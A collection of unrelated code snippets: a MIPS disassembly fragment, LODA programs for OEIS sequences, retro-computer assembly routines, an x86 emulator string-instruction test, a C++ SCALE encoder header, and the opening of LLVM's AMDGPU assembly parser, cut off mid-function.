8b4: 00000030 0x30
8b8: 0000001d 0x1d
8bc: 0000001f 0x1f
8c0: 00402a58 0x402a58
...
8d8: 0000001d 0x1d
8dc: 0000001f 0x1f
8e0: 00402a60 0x402a60
8e4: 80000000 lb zero,0(zero)
8e8: fffffff8 0xfffffff8
...
8f4: 00000020 add zero,zero,zero
8f8: 0000001d 0x1d
8fc: 0000001f 0x1f
900: 00402aa0 0x402aa0
...
918: 0000001d 0x1d
91c: 0000001f 0x1f
920: 00402aa8 0x402aa8
...
938: 0000001d 0x1d
93c: 0000001f 0x1f
940: 00402ab0 0x402ab0
944: 80030000 lb v1,0(zero)
948: fffffff8 0xfffffff8
...
954: 00000020 add zero,zero,zero
958: 0000001d 0x1d
95c: 0000001f 0x1f
960: 00402b18 0x402b18
964: 80000000 lb zero,0(zero)
968: fffffff8 0xfffffff8
...
974: 00000018 mult zero,zero
978: 0000001d 0x1d
97c: 0000001f 0x1f
980: 00402b50 0x402b50
984: 80030000 lb v1,0(zero)
988: fffffff8 0xfffffff8
...
994: 00000028 0x28
998: 0000001d 0x1d
99c: 0000001f 0x1f
9a0: 00402bb4 0x402bb4
9a4: 800f0000 lb t7,0(zero)
9a8: fffffff8 0xfffffff8
...
9b4: 00000030 0x30
9b8: 0000001d 0x1d
9bc: 0000001f 0x1f
9c0: 00402c30 0x402c30
9c4: 80010000 lb at,0(zero)
9c8: fffffffc 0xfffffffc
...
9d4: 00000028 0x28
9d8: 0000001d 0x1d
9dc: 0000001f 0x1f
9e0: 00402ca8 0x402ca8
9e4: 80000000 lb zero,0(zero)
9e8: fffffff8 0xfffffff8
...
9f4: 00000018 mult zero,zero
9f8: 0000001d 0x1d
9fc: 0000001f 0x1f
a00: 00402ce4 0x402ce4
a04: 80000000 lb zero,0(zero)
a08: fffffff8 0xfffffff8
...
a14: 00000018 mult zero,zero
a18: 0000001d 0x1d
a1c: 0000001f 0x1f
a20: 00402d18 0x402d18
a24: 80000000 lb zero,0(zero)
a28: fffffff8 0xfffffff8
...
a34: 00000018 mult zero,zero
a38: 0000001d 0x1d
a3c: 0000001f 0x1f
a40: 00402d54 0x402d54
a44: 80030000 lb v1,0(zero)
a48: fffffff8 0xfffffff8
...
a54: 00000020 add zero,zero,zero
a58: 0000001d 0x1d
a5c: 0000001f 0x1f
a60: 00402db4 0x402db4
a64: 80000000 lb zero,0(zero)
a68: fffffff8 0xfffffff8
...
a74: 00000018 mult zero,zero
a78: 0000001d 0x1d
a7c: 0000001f 0x1f
a80: 00402df0 0x402df0
a84: 80000000 lb zero,0(zero)
a88: fffffff8 0xfffffff8
...
a94: 00000020 add zero,zero,zero
a98: 0000001d 0x1d
a9c: 0000001f 0x1f
aa0: 00402e34 0x402e34
aa4: 80000000 lb zero,0(zero)
aa8: fffffff8 0xfffffff8
...
ab4: 00000020 add zero,zero,zero
ab8: 0000001d 0x1d
abc: 0000001f 0x1f
ac0: 00402ea0 0x402ea0
ac4: 80030000 lb v1,0(zero)
ac8: fffffff8 0xfffffff8
...
ad4: 00000020 add zero,zero,zero
ad8: 0000001d 0x1d
adc: 0000001f 0x1f
ae0: 00402f48 0x402f48
ae4: 803f0000 lb ra,0(at)
ae8: fffffff8 0xfffffff8
...
af4: 000000b0 0xb0
af8: 0000001d 0x1d
afc: 0000001f 0x1f
b00: 00402ff8 0x402ff8
...
b18: 0000001d 0x1d
b1c: 0000001f 0x1f
b20: 00403000 0x403000
b24: 80000000 lb zero,0(zero)
b28: fffffff8 0xfffffff8
...
b34: 00000018 mult zero,zero
b38: 0000001d 0x1d
b3c: 0000001f 0x1f
b40: 00403030 0x403030
...
b58: 0000001d 0x1d
b5c: 0000001f 0x1f
b60: 0040307c 0x40307c
b64: 80030000 lb v1,0(zero)
b68: fffffff8 0xfffffff8
...
b74: 00000228 0x228
b78: 0000001d 0x1d
b7c: 0000001f 0x1f
|
; A326663: Column 3 of the array at A309157; see Comments.
; 5,12,20,26,33,41,47,54,61,68,75,83,89,96,104,110,117,124,131,138,146,152,159,167,173,180,188,194,201,209,215,222,230,236,243,250,257,264,272,278,285,293,299,306,313,320,327,335,341,348,356,362,369,377,383,390,398,404,411,419,425,432,439,446,453,461,467,474,482,488,495,502,509,516,524,530,537,545,551,558,565,572,579,587,593,600,608,614,621,628,635,642,650,656,663,671,677,684,691,698,705,713,719,726,734,740,747,755,761,768,776,782,789,797,803,810,817,824,831,839,845,852,860,866,873,880,887,894,902,908,915,923,929,936,944,950,957,965,971,978,986,992,999,1006,1013,1020,1028,1034,1041,1049,1055,1062,1069,1076,1083,1091,1097,1104,1112,1118,1125,1132,1139,1146,1154,1160,1167,1175,1181,1188,1195,1202,1209,1217,1223,1230,1238,1244,1251,1258,1265,1272,1280,1286,1293,1301,1307,1314,1322,1328,1335,1343,1349,1356,1364,1370,1377,1384,1391,1398,1406,1412,1419,1427,1433,1440,1447,1454,1461,1469,1475,1482,1490,1496,1503,1511,1517,1524,1532,1538,1545,1553,1559,1566,1573,1580,1587,1595,1601,1608,1616,1622,1629,1636,1643,1650,1658,1664,1671,1679,1685,1692,1700,1706,1713,1721,1727,1734,1742,1748
mov $3,$0        ; save input n in $3
add $0,1         ; $0 = n + 1
gcd $0,19683     ; 19683 = 3^9: $0 becomes the largest power of 3 dividing n+1 (capped at 3^9)
lpb $0,1         ; loop while $0 > 0, reducing it each pass
sub $0,8         ; step down by 8; loop leaves a small residue in $0
lpe
trn $0,2         ; truncated subtraction: $0 = max($0 - 2, 0) — correction term
mov $1,$0        ; start building the result from the correction
add $1,5         ; constant offset of the column formula
mov $2,$3
mul $2,7         ; 7 * n — dominant linear term of the sequence
add $1,$2        ; result (output register $1) = 7*n + 5 + correction
|
;
; ZX Spectrum specific routines
;
; int if1_installed();
;
; The result is:
; - 0 (false) if the ZX Interface1 is missing or not paged in
; - 1 (true) if the ZX Interface1 is connected and activated.
;
; $Id: if1_installed.asm,v 1.3 2016/06/10 20:02:04 dom Exp $
;
SECTION code_clib
PUBLIC if1_installed
PUBLIC _if1_installed

; int if1_installed();
; Detects whether the ZX Interface 1 shadow ROM is paged in by checking the
; system variable PROG (address 23635): with the IF1 active, PROG holds 23813.
; Returns HL = 1 (true) when detected, HL = 0 (false) otherwise.
if1_installed:
_if1_installed:
	ld	hl,(23635)		; HL = contents of sysvar PROG
	ld	de,23813		; value PROG takes when IF1 is paged in
	and	a			; BUGFIX: clear carry — SBC subtracts DE *plus* carry,
					; and carry is undefined on entry, so the compare
					; could previously be off by one
	sbc	hl,de			; HL = PROG - 23813
	ld	a,h
	or	l			; Z set iff the difference is zero
	ld	hl,0			; prepare "false" return value
	ret	nz			; mismatch -> return 0
	inc	hl			; match -> return 1
	ret
|
/**
* Copyright Soramitsu Co., Ltd. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
#define KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
#include <deque>
#include <boost/optional.hpp>
#include <gsl/span>
#include "scale/detail/fixed_witdh_integer.hpp"
#include "scale/detail/tuple.hpp"
#include "scale/detail/variant.hpp"
namespace kagome::scale {
/**
* @class ScaleEncoderStream designed to scale-encode data to stream
*/
class ScaleEncoderStream {
 public:
  /// Special tag allowing templates to distinguish encoding streams
  /// from decoding streams at compile time.
  static constexpr auto is_encoder_stream = true;

  /// Getters
  /**
   * @return vector of bytes containing encoded data
   */
  std::vector<uint8_t> data() const;

  /**
   * @brief scale-encodes pair of values (first, then second)
   * @tparam F first value type
   * @tparam S second value type
   * @param p pair of values to encode
   * @return reference to stream
   */
  template <class F, class S>
  ScaleEncoderStream &operator<<(const std::pair<F, S> &p) {
    return *this << p.first << p.second;
  }

  /**
   * @brief scale-encodes tuple of values
   * @tparam T enumeration of types
   * @param v tuple value
   * @return reference to stream
   * @note taken by const reference; the previous signature took the tuple
   * by value, which copied every element on each call for no benefit
   */
  template <class... T>
  ScaleEncoderStream &operator<<(const std::tuple<T...> &v) {
    return detail::encodeTuple(v, *this);
  }

  /**
   * @brief scale-encodes variant value (active index, then the value)
   * @tparam T type list
   * @param v value to encode
   * @return reference to stream
   */
  template <class... T>
  ScaleEncoderStream &operator<<(const boost::variant<T...> &v) {
    return detail::encodeVariant(v, *this);
  }

  /**
   * @brief scale-encodes collection of same type items
   * @tparam T type of item
   * @param c collection to encode
   * @return reference to stream
   */
  template <class T>
  ScaleEncoderStream &operator<<(const std::vector<T> &c) {
    return encodeCollection(c.size(), c.begin(), c.end());
  }

  /**
   * @brief scale-encodes optional value
   * @tparam T value type
   * @param v value to encode
   * @return reference to stream
   */
  template <class T>
  ScaleEncoderStream &operator<<(const boost::optional<T> &v) {
    // optional bool is a special case of optional values:
    // it is encoded using one byte instead of two, as described in the
    // SCALE specification
    if constexpr (std::is_same<T, bool>::value) {
      return encodeOptionalBool(v);
    }
    if (!v.has_value()) {
      return putByte(0u);  // "none" marker
    }
    return putByte(1u) << *v;  // "some" marker followed by the value
  }

  /**
   * @brief appends a sequence of bytes viewed through a span
   * @param v bytes sequence
   * @return reference to stream
   */
  template <class T>
  ScaleEncoderStream &operator<<(const gsl::span<T> &v) {
    return encodeCollection(v.size(), v.begin(), v.end());
  }

  /**
   * @brief scale-encodes array of items
   * @tparam T item type
   * @tparam size of the array
   * @param a reference to the array
   * @return reference to stream
   */
  template <typename T, size_t size>
  ScaleEncoderStream &operator<<(const std::array<T, size> &a) {
    // TODO(akvinikym) PRE-285: bad implementation: maybe move to another file
    // and implement it
    return encodeCollection(size, a.begin(), a.end());
  }

  /**
   * @brief scale-encodes uint256_t to stream
   * @param i value to encode
   * @return reference to stream
   * @warning not implemented yet: the value is currently silently dropped
   */
  ScaleEncoderStream &operator<<(const boost::multiprecision::uint256_t &i) {
    // TODO(akvinikym) PRE-285: maybe move to another file and implement it
    return *this;
  }

  /**
   * @brief scale-encodes std::reference_wrapper of a type by encoding the
   * referenced value
   * @tparam T underlying type
   * @param v value to encode
   * @return reference to stream
   */
  template <class T>
  ScaleEncoderStream &operator<<(const std::reference_wrapper<T> &v) {
    return *this << static_cast<const T &>(v);
  }

  /**
   * @brief scale-encodes a string view (length prefix, then bytes)
   * @param sv string_view item
   * @return reference to stream
   */
  ScaleEncoderStream &operator<<(std::string_view sv) {
    return encodeCollection(sv.size(), sv.begin(), sv.end());
  }

  /**
   * @brief scale-encodes any integral type including bool
   * @tparam T integral type
   * @param v value of integral type
   * @return reference to stream
   */
  template <typename T,
            typename I = std::decay_t<T>,
            typename = std::enable_if_t<std::is_integral<I>::value>>
  ScaleEncoderStream &operator<<(T &&v) {
    // encode bool as a single 0/1 byte
    if constexpr (std::is_same<I, bool>::value) {
      uint8_t byte = (v ? 1u : 0u);
      return putByte(byte);
    }
    // single-byte integers go straight to the buffer
    if constexpr (sizeof(T) == 1u) {
      // to avoid infinite recursion
      return putByte(static_cast<uint8_t>(v));
    }
    // encode any other integer in fixed-width little-endian form
    detail::encodeInteger<I>(v, *this);
    return *this;
  }

  /**
   * @brief scale-encodes CompactInteger value as compact integer
   * @param v value to encode
   * @return reference to stream
   */
  ScaleEncoderStream &operator<<(const CompactInteger &v);

 protected:
  /**
   * @brief scale-encodes any collection: compact-encoded size, then each item
   * @tparam It iterator over collection of bytes
   * @param size size of the collection
   * @param begin iterator pointing to the begin of collection
   * @param end iterator pointing to the end of collection
   * @return reference to stream
   */
  template <class It>
  ScaleEncoderStream &encodeCollection(const CompactInteger &size,
                                       It &&begin,
                                       It &&end) {
    *this << size;
    // NOLINTNEXTLINE(cppcoreguidelines-pro-bounds-pointer-arithmetic)
    for (auto &&it = begin; it != end; ++it) {
      *this << *it;
    }
    return *this;
  }

  /// Appenders
  /**
   * @brief puts a byte to buffer
   * @param v byte value
   * @return reference to stream
   */
  ScaleEncoderStream &putByte(uint8_t v);

 private:
  /// Encodes optional<bool> into a single byte (none / false / true).
  ScaleEncoderStream &encodeOptionalBool(const boost::optional<bool> &v);

  /// Accumulated encoded bytes.
  std::deque<uint8_t> stream_;
};
} // namespace kagome::scale
#endif // KAGOME_CORE_SCALE_SCALE_ENCODER_STREAM_HPP
|
; A006097: Gaussian binomial coefficient [ n,4 ] for q=2.
; Submitted by Christian Krause
; 1,31,651,11811,200787,3309747,53743987,866251507,13910980083,222984027123,3571013994483,57162391576563,914807651274739,14638597687734259,234230965858250739,3747802679431278579,59965700687947706355,959458073589354016755,15351384078270441402355,245622584459786286215155,3929964865019186398572531,62879465949619557050036211,1006071680068460422671314931,16097148680091934491674619891,257554393273444244298166906867,4120870407510897250621338890227,65933927441260682754345641390067
mov $2,$0        ; $2 = loop counter, runs n+1 iterations
add $2,1
mov $3,$0        ; save input n
lpb $2           ; for k = 0 .. n
mov $0,$3
sub $2,1
sub $0,$2        ; $0 = n - (remaining count) = current index k
seq $0,28258 ; Expansion of 1/((1-2*x)*(1-4*x)(1-8*x)(1-16*x)).
add $1,$0        ; accumulate: result is the partial sum of A028258(0..n)
lpe
mov $0,$1        ; move the sum into the output register
|
%ifdef CONFIG
{
"RegData": {
"RAX": "0xF2F2F2F2F2F2F2F2",
"RDX": "0x0",
"RDI": "0xE000000F"
},
"MemoryRegions": {
"0x100000000": "4096"
}
}
%endif
mov rdx, 0xe0000000        ; base of the mapped scratch region (see MemoryRegions)
mov rax, 0x4142434445464748
mov [rdx + 8 * 0], rax     ; qword 0: sentinel pattern "HGFEDCBA"
mov rax, 0x5152535455565758
mov [rdx + 8 * 1], rax     ; qword 1: sentinel pattern "XWVUTSRQ"
mov rax, 0x0
mov [rdx + 8 * 2], rax     ; qword 2: cleared — will be filled by rep stosb
mov [rdx + 8 * 3], rax     ; qword 3: cleared — must stay 0 (checked via RDX)
lea rdi, [rdx + 8 * 2 + 7] ; point RDI at the HIGHEST byte of qword 2
std                        ; set DF=1: string ops decrement RDI
mov rcx, 8                 ; store 8 bytes
mov rax, 0xF2              ; AL = fill byte
rep stosb ; stores AL at [rdi], rdi -= 1, repeated RCX times (descending fill of qword 2)
mov rax, [rdx + 8 * 2]     ; expect 0xF2F2F2F2F2F2F2F2 — descending fill stayed in qword 2
mov rdx, [rdx + 8 * 3]     ; expect 0x0 — qword 3 untouched; RDI ends at 0xE000000F
hlt
|
-- HUMAN RESOURCE MACHINE PROGRAM --
-- fibseq[fibseq <= in1], ... -> out
-- a: read a new upper bound from the inbox, reset the two   --
-- running Fibonacci terms, and emit the first term (1).     --
-- Tiles: 0/1 = current pair of terms, 2 = bound+1,          --
-- 9 = presumably holds 0 (used to seed the terms) — verify. --
a:
INBOX
COPYTO 2
BUMPUP 2
COPYFROM 9
COPYTO 0
BUMPUP 0
COPYTO 1
OUTBOX
-- b: emit tile 1, advance tile 0 to the next term,          --
-- loop to c while the term is still within the bound.       --
b:
COPYFROM 1
OUTBOX
COPYFROM 1
ADD 0
COPYTO 0
SUB 2
JUMPN c
JUMP a
-- c: emit tile 0, advance tile 1, and alternate back to b;  --
-- when a term exceeds the bound, fall through to a.         --
c:
COPYFROM 0
OUTBOX
COPYFROM 0
ADD 1
COPYTO 1
SUB 2
JUMPN b
JUMP a
|
;*******************************************************************************
;* Tutorial Twenty-Five Debugging Test Program *
;* *
;* Written By John C. Dale *
;* Tutorial #25 CBM Prg Studio Tutorial 005 *
;* Date : 18th Nov, 2017 *
;* *
;*******************************************************************************
;* *
;*******************************************************************************
;*******************************************************************************
;* *
;* Create DEBUG WatchList *
;* *
;*******************************************************************************
; Watch the two operand bytes of the self-modified STA below so the
; debugger shows the screen address changing each iteration.
WATCH SCREENLOCATIONLO
WATCH SCREENLOCATIONHI
;*******************************************************************************
;*                                                                             *
;*      Assembler Static Variables                                             *
;*                                                                             *
;*******************************************************************************
; SCREENLOCATION labels the STA instruction itself; +1/+2 address its
; 16-bit operand (low byte, high byte) — this is self-modifying code.
SCREENLOCATIONLO = SCREENLOCATION + 1
SCREENLOCATIONHI = SCREENLOCATION + 2
*=$9000
lda #0
tax                     ; X = column/offset index
tay                     ; Y = iteration counter
LOOPER
lda #'a'                ; character to write
SCREENLOCATION
sta $0400,x             ; operand $0400 is rewritten below (+40 per pass)
inx
iny
lda SCREENLOCATION+1    ; low byte of the STA operand
clc
adc #40                 ; advance one screen row (40 columns)
sta SCREENLOCATION+1
lda SCREENLOCATION+2    ; propagate carry into the high byte
adc #0
sta SCREENLOCATION+2
cpy #20                 ; run 20 iterations
bne LOOPER
rts
|
; A146559: Expansion of (1-x)/(1 - 2*x + 2*x^2).
; 1,1,0,-2,-4,-4,0,8,16,16,0,-32,-64,-64,0,128,256,256,0,-512,-1024,-1024,0,2048,4096,4096,0,-8192,-16384,-16384,0,32768,65536,65536,0,-131072,-262144,-262144,0,524288,1048576,1048576,0,-2097152,-4194304,-4194304,0,8388608,16777216,16777216,0,-33554432,-67108864,-67108864,0,134217728,268435456,268435456,0,-536870912,-1073741824,-1073741824,0,2147483648,4294967296,4294967296,0,-8589934592,-17179869184,-17179869184,0,34359738368,68719476736,68719476736,0,-137438953472,-274877906944,-274877906944,0
mov $1,1         ; $1 = running term, a(0) = 1
mov $2,2         ; $2 = auxiliary accumulator
lpb $0           ; iterate n times
sub $0,1
add $2,$1        ; $2 += previous term
add $1,1
mul $1,2         ; $1 = 2*($1 + 1)
sub $1,$2        ; $1 = 2*$1 + 2 - $2 — recurrence a(n) = 2a(n-1) - 2a(n-2)
lpe
mov $0,$1        ; output the n-th term
|
//===- AMDGPUAsmParser.cpp - Parse SI asm to MCInst instructions ----------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#include "AMDKernelCodeT.h"
#include "MCTargetDesc/AMDGPUMCTargetDesc.h"
#include "MCTargetDesc/AMDGPUTargetStreamer.h"
#include "SIDefines.h"
#include "SIInstrInfo.h"
#include "SIRegisterInfo.h"
#include "TargetInfo/AMDGPUTargetInfo.h"
#include "Utils/AMDGPUAsmUtils.h"
#include "Utils/AMDGPUBaseInfo.h"
#include "Utils/AMDKernelCodeTUtils.h"
#include "llvm/ADT/APFloat.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/StringSet.h"
#include "llvm/ADT/Twine.h"
#include "llvm/BinaryFormat/ELF.h"
#include "llvm/MC/MCAsmInfo.h"
#include "llvm/MC/MCContext.h"
#include "llvm/MC/MCExpr.h"
#include "llvm/MC/MCInst.h"
#include "llvm/MC/MCParser/MCAsmLexer.h"
#include "llvm/MC/MCParser/MCAsmParser.h"
#include "llvm/MC/MCParser/MCParsedAsmOperand.h"
#include "llvm/MC/MCParser/MCTargetAsmParser.h"
#include "llvm/MC/MCSymbol.h"
#include "llvm/MC/TargetRegistry.h"
#include "llvm/Support/AMDGPUMetadata.h"
#include "llvm/Support/AMDHSAKernelDescriptor.h"
#include "llvm/Support/Casting.h"
#include "llvm/Support/MachineValueType.h"
#include "llvm/Support/TargetParser.h"
using namespace llvm;
using namespace llvm::AMDGPU;
using namespace llvm::amdhsa;
namespace {
class AMDGPUAsmParser;
enum RegisterKind { IS_UNKNOWN, IS_VGPR, IS_SGPR, IS_AGPR, IS_TTMP, IS_SPECIAL };
//===----------------------------------------------------------------------===//
// Operand
//===----------------------------------------------------------------------===//
class AMDGPUOperand : public MCParsedAsmOperand {
enum KindTy {
Token,
Immediate,
Register,
Expression
} Kind;
SMLoc StartLoc, EndLoc;
const AMDGPUAsmParser *AsmParser;
public:
AMDGPUOperand(KindTy Kind_, const AMDGPUAsmParser *AsmParser_)
: Kind(Kind_), AsmParser(AsmParser_) {}
using Ptr = std::unique_ptr<AMDGPUOperand>;
struct Modifiers {
bool Abs = false;
bool Neg = false;
bool Sext = false;
bool hasFPModifiers() const { return Abs || Neg; }
bool hasIntModifiers() const { return Sext; }
bool hasModifiers() const { return hasFPModifiers() || hasIntModifiers(); }
int64_t getFPModifiersOperand() const {
int64_t Operand = 0;
Operand |= Abs ? SISrcMods::ABS : 0u;
Operand |= Neg ? SISrcMods::NEG : 0u;
return Operand;
}
int64_t getIntModifiersOperand() const {
int64_t Operand = 0;
Operand |= Sext ? SISrcMods::SEXT : 0u;
return Operand;
}
int64_t getModifiersOperand() const {
assert(!(hasFPModifiers() && hasIntModifiers())
&& "fp and int modifiers should not be used simultaneously");
if (hasFPModifiers()) {
return getFPModifiersOperand();
} else if (hasIntModifiers()) {
return getIntModifiersOperand();
} else {
return 0;
}
}
friend raw_ostream &operator <<(raw_ostream &OS, AMDGPUOperand::Modifiers Mods);
};
enum ImmTy {
ImmTyNone,
ImmTyGDS,
ImmTyLDS,
ImmTyOffen,
ImmTyIdxen,
ImmTyAddr64,
ImmTyOffset,
ImmTyInstOffset,
ImmTyOffset0,
ImmTyOffset1,
ImmTyCPol,
ImmTySWZ,
ImmTyTFE,
ImmTyD16,
ImmTyClampSI,
ImmTyOModSI,
ImmTyDPP8,
ImmTyDppCtrl,
ImmTyDppRowMask,
ImmTyDppBankMask,
ImmTyDppBoundCtrl,
ImmTyDppFi,
ImmTySdwaDstSel,
ImmTySdwaSrc0Sel,
ImmTySdwaSrc1Sel,
ImmTySdwaDstUnused,
ImmTyDMask,
ImmTyDim,
ImmTyUNorm,
ImmTyDA,
ImmTyR128A16,
ImmTyA16,
ImmTyLWE,
ImmTyExpTgt,
ImmTyExpCompr,
ImmTyExpVM,
ImmTyFORMAT,
ImmTyHwreg,
ImmTyOff,
ImmTySendMsg,
ImmTyInterpSlot,
ImmTyInterpAttr,
ImmTyAttrChan,
ImmTyOpSel,
ImmTyOpSelHi,
ImmTyNegLo,
ImmTyNegHi,
ImmTySwizzle,
ImmTyGprIdxMode,
ImmTyHigh,
ImmTyBLGP,
ImmTyCBSZ,
ImmTyABID,
ImmTyEndpgm,
};
enum ImmKindTy {
ImmKindTyNone,
ImmKindTyLiteral,
ImmKindTyConst,
};
private:
struct TokOp {
const char *Data;
unsigned Length;
};
struct ImmOp {
int64_t Val;
ImmTy Type;
bool IsFPImm;
mutable ImmKindTy Kind;
Modifiers Mods;
};
struct RegOp {
unsigned RegNo;
Modifiers Mods;
};
union {
TokOp Tok;
ImmOp Imm;
RegOp Reg;
const MCExpr *Expr;
};
public:
bool isToken() const override {
if (Kind == Token)
return true;
// When parsing operands, we can't always tell if something was meant to be
// a token, like 'gds', or an expression that references a global variable.
// In this case, we assume the string is an expression, and if we need to
// interpret is a token, then we treat the symbol name as the token.
return isSymbolRefExpr();
}
bool isSymbolRefExpr() const {
return isExpr() && Expr && isa<MCSymbolRefExpr>(Expr);
}
bool isImm() const override {
return Kind == Immediate;
}
void setImmKindNone() const {
assert(isImm());
Imm.Kind = ImmKindTyNone;
}
void setImmKindLiteral() const {
assert(isImm());
Imm.Kind = ImmKindTyLiteral;
}
void setImmKindConst() const {
assert(isImm());
Imm.Kind = ImmKindTyConst;
}
bool IsImmKindLiteral() const {
return isImm() && Imm.Kind == ImmKindTyLiteral;
}
bool isImmKindConst() const {
return isImm() && Imm.Kind == ImmKindTyConst;
}
bool isInlinableImm(MVT type) const;
bool isLiteralImm(MVT type) const;
bool isRegKind() const {
return Kind == Register;
}
bool isReg() const override {
return isRegKind() && !hasModifiers();
}
bool isRegOrInline(unsigned RCID, MVT type) const {
return isRegClass(RCID) || isInlinableImm(type);
}
bool isRegOrImmWithInputMods(unsigned RCID, MVT type) const {
return isRegOrInline(RCID, type) || isLiteralImm(type);
}
bool isRegOrImmWithInt16InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::i16);
}
bool isRegOrImmWithInt32InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::i32);
}
bool isRegOrImmWithInt64InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_64RegClassID, MVT::i64);
}
bool isRegOrImmWithFP16InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::f16);
}
bool isRegOrImmWithFP32InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_32RegClassID, MVT::f32);
}
bool isRegOrImmWithFP64InputMods() const {
return isRegOrImmWithInputMods(AMDGPU::VS_64RegClassID, MVT::f64);
}
bool isVReg() const {
return isRegClass(AMDGPU::VGPR_32RegClassID) ||
isRegClass(AMDGPU::VReg_64RegClassID) ||
isRegClass(AMDGPU::VReg_96RegClassID) ||
isRegClass(AMDGPU::VReg_128RegClassID) ||
isRegClass(AMDGPU::VReg_160RegClassID) ||
isRegClass(AMDGPU::VReg_192RegClassID) ||
isRegClass(AMDGPU::VReg_256RegClassID) ||
isRegClass(AMDGPU::VReg_512RegClassID) ||
isRegClass(AMDGPU::VReg_1024RegClassID);
}
bool isVReg32() const {
return isRegClass(AMDGPU::VGPR_32RegClassID);
}
// Composite predicate: accepts either the literal 'off' token (parsed as an
// ImmTyOff immediate) or a 32-bit VGPR.
bool isVReg32OrOff() const {
return isOff() || isVReg32();
}
// True if the operand is the special SGPR_NULL register.
bool isNull() const {
return isRegKind() && getReg() == AMDGPU::SGPR_NULL;
}
// Out-of-line predicates; definitions live elsewhere in this file.
bool isVRegWithInputMods() const;
bool isSDWAOperand(MVT type) const;
bool isSDWAFP16Operand() const;
bool isSDWAFP32Operand() const;
bool isSDWAInt16Operand() const;
bool isSDWAInt32Operand() const;
// True if the operand is an immediate whose type tag equals ImmT.
bool isImmTy(ImmTy ImmT) const {
return isImm() && Imm.Type == ImmT;
}
// True if the operand is an immediate carrying any named modifier type
// (i.e. anything other than a plain ImmTyNone value).
bool isImmModifier() const {
return isImm() && Imm.Type != ImmTyNone;
}
// One predicate per named immediate operand/modifier type, used by the
// generated asm matcher. Most just test the type tag; a few additionally
// range-check the value (isOffset: 16-bit, isOffset0/1: 8-bit,
// isFORMAT: 7-bit unsigned).
bool isClampSI() const { return isImmTy(ImmTyClampSI); }
bool isOModSI() const { return isImmTy(ImmTyOModSI); }
bool isDMask() const { return isImmTy(ImmTyDMask); }
bool isDim() const { return isImmTy(ImmTyDim); }
bool isUNorm() const { return isImmTy(ImmTyUNorm); }
bool isDA() const { return isImmTy(ImmTyDA); }
bool isR128A16() const { return isImmTy(ImmTyR128A16); }
bool isGFX10A16() const { return isImmTy(ImmTyA16); }
bool isLWE() const { return isImmTy(ImmTyLWE); }
bool isOff() const { return isImmTy(ImmTyOff); }
bool isExpTgt() const { return isImmTy(ImmTyExpTgt); }
bool isExpVM() const { return isImmTy(ImmTyExpVM); }
bool isExpCompr() const { return isImmTy(ImmTyExpCompr); }
bool isOffen() const { return isImmTy(ImmTyOffen); }
bool isIdxen() const { return isImmTy(ImmTyIdxen); }
bool isAddr64() const { return isImmTy(ImmTyAddr64); }
bool isOffset() const { return isImmTy(ImmTyOffset) && isUInt<16>(getImm()); }
bool isOffset0() const { return isImmTy(ImmTyOffset0) && isUInt<8>(getImm()); }
bool isOffset1() const { return isImmTy(ImmTyOffset1) && isUInt<8>(getImm()); }
// Flat instructions accept either offset flavor; no range check here.
bool isFlatOffset() const { return isImmTy(ImmTyOffset) || isImmTy(ImmTyInstOffset); }
bool isGDS() const { return isImmTy(ImmTyGDS); }
bool isLDS() const { return isImmTy(ImmTyLDS); }
bool isCPol() const { return isImmTy(ImmTyCPol); }
bool isSWZ() const { return isImmTy(ImmTySWZ); }
bool isTFE() const { return isImmTy(ImmTyTFE); }
bool isD16() const { return isImmTy(ImmTyD16); }
bool isFORMAT() const { return isImmTy(ImmTyFORMAT) && isUInt<7>(getImm()); }
// DPP modifiers.
bool isBankMask() const { return isImmTy(ImmTyDppBankMask); }
bool isRowMask() const { return isImmTy(ImmTyDppRowMask); }
bool isBoundCtrl() const { return isImmTy(ImmTyDppBoundCtrl); }
bool isFI() const { return isImmTy(ImmTyDppFi); }
// SDWA selector/unused modifiers.
bool isSDWADstSel() const { return isImmTy(ImmTySdwaDstSel); }
bool isSDWASrc0Sel() const { return isImmTy(ImmTySdwaSrc0Sel); }
bool isSDWASrc1Sel() const { return isImmTy(ImmTySdwaSrc1Sel); }
bool isSDWADstUnused() const { return isImmTy(ImmTySdwaDstUnused); }
// Interpolation operands.
bool isInterpSlot() const { return isImmTy(ImmTyInterpSlot); }
bool isInterpAttr() const { return isImmTy(ImmTyInterpAttr); }
bool isAttrChan() const { return isImmTy(ImmTyAttrChan); }
// VOP3P op_sel/neg modifiers.
bool isOpSel() const { return isImmTy(ImmTyOpSel); }
bool isOpSelHi() const { return isImmTy(ImmTyOpSelHi); }
bool isNegLo() const { return isImmTy(ImmTyNegLo); }
bool isNegHi() const { return isImmTy(ImmTyNegHi); }
bool isHigh() const { return isImmTy(ImmTyHigh); }
bool isMod() const {
return isClampSI() || isOModSI();
}
bool isRegOrImm() const {
return isReg() || isImm();
}
// Out-of-line predicates; definitions live elsewhere in this file.
bool isRegClass(unsigned RCID) const;
bool isInlineValue() const;
// True if the operand is a register of class RCID or an inline constant of
// the given type, and carries no abs/neg/sext source modifiers.
bool isRegOrInlineNoMods(unsigned RCID, MVT type) const {
return isRegOrInline(RCID, type) && !hasModifiers();
}
// SCSrc*: scalar (SGPR-class) source operands that also accept inline
// constants, but not arbitrary literals.
bool isSCSrcB16() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::i16);
}
// Packed 2x16-bit variant shares the 16-bit check.
bool isSCSrcV2B16() const {
return isSCSrcB16();
}
bool isSCSrcB32() const {
return isRegOrInlineNoMods(AMDGPU::SReg_32RegClassID, MVT::i32);
}
bool isSCSrcB64() const {
return isRegOrInlineNoMods(AMDGPU::SReg_64RegClassID, MVT::i64);
}
bool isBoolReg() const;
bool isSCSrcF16() const {
